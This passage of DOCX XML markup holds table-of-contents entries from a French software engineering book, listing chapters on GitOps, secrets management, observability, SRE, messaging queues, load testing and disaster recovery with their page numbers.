          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>704</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81. GitOps : le dépôt comme source de vérité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>709</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81.1 Quatre principes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>709</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81.2 Argo CD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>710</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81.3 Flux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>711</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81.4 Organiser le dépôt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>712</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>81.5 Dérive et retour arrière</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>713</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82. Gestion des secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>718</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.1 Ce qui est secret, ce qui ne l'est pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>718</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.2 Trois familles de solutions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>718</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.3 SOPS et Sealed Secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>719</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.4 Consommer un secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>720</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.5 Rotation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>721</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>82.6 Détecter et réagir à une fuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>722</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83. Observabilité : métriques, journaux et traces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>726</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83.1 Trois signaux, trois questions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>726</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83.2 Métriques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>727</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83.3 Journaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>728</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83.4 Traces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>729</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>83.5 Alertes utiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>730</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84. SRE : objectifs de fiabilité et gestion d'incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>735</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84.1 Fiabilité mesurable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>735</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84.2 Choisir un indicateur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>736</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84.3 Utiliser le budget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>737</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84.4 Répondre à un incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>737</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>84.5 Analyser sans reproche</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>738</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie VI — Systèmes distribués et industrialisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85. Messagerie et files d'attente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>743</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85.1 Pourquoi un intermédiaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>744</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85.2 Garanties de livraison</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>744</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85.3 Consommateur idempotent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>745</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85.4 Ordre et partitionnement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>746</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>85.5 Exploiter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>747</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86. Tests de charge et performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>752</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86.1 Ce qu'on mesure vraiment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>752</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86.2 Écrire un scénario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>753</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86.3 Lire les résultats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>754</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86.4 Trouver le goulot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>755</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>86.5 Budget de performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>756</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>87. Résilience : sauvegardes et reprise après sinistre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>87.1 Deux nombres à décider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
